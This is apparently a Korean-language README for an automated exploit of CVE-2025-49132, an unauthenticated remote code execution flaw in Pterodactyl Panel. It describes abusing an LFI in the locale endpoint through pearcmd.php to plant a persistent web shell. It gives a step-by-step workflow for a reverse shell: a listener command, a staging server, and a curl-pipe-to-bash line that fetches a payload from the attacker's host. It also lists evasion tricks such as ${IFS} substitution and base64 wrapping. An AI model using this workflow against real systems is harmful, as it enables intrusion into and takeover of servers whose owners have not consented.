
CVE-2025-49132용 자동화 익스플로잇, Pterodactyl Panel의 심각한 인증되지 않은 RCE. 로케일 엔드포인트를 통한 LFI를 활용하여 지속적인 웹 셸을 배포하고 리버스 셸 액세스를 달성합니다.
이 저장소에는 Pterodactyl 패널(v1.11.11 이전 버전)의 치명적인 인증되지 않은 원격 코드 실행(RCE) 취약점인 CVE-2025-49132를 위한 특수 익스플로잇이 포함되어 있습니다.
이 취약점은 /locales/locale.json 엔드포인트에 존재합니다. 공격자는 locale 및 namespace 쿼리 매개변수를 조작하여 pearcmd.php와 상호 작용하는 로컬 파일 포함(LFI)을 악용할 수 있습니다. 이를 통해 임의 파일 생성과 명령 실행이 가능해져 시스템 전체가 손상될 수 있습니다.
ape.py 스크립트는 다음 단계를 자동화합니다:
PEAR 검색: 대상에서 PEAR 설치 위치를 찾기 위해 디렉터리 구조를 퍼징합니다.
백도어 생성: PEAR의 config-create를 사용하여 /tmp/shell.php에 지속성 있는 웹 셸을 작성합니다.
대상에서 성공적인 콜백을 얻으려면 다음 작업 흐름을 따르세요:
penelope -p 4444
스테이징 서버: 사용자 지정 셸 스크립트를 사용하는 경우 Python으로 호스팅하세요:
python3 -m http.server 8080
python3 ape.py --host xxx.xxx.xxx --interactive
shell> curl http://<YOUR_IP>:8080/shell.sh | bash
공백 우회: 페이로드가 URL 파싱 과정에서도 유지되도록 ${IFS}를 자동으로 사용합니다.
Base64 래퍼: 대상의 Nginx/웹 서버에 의한 문자 손상을 방지하기 위해 리버스 셸 명령을 Base64로 래핑합니다.
타임아웃 처리: 웹 요청이 중단되더라도 리버스 셸이 성공적으로 연결되었는지 감지하도록 설계되었습니다.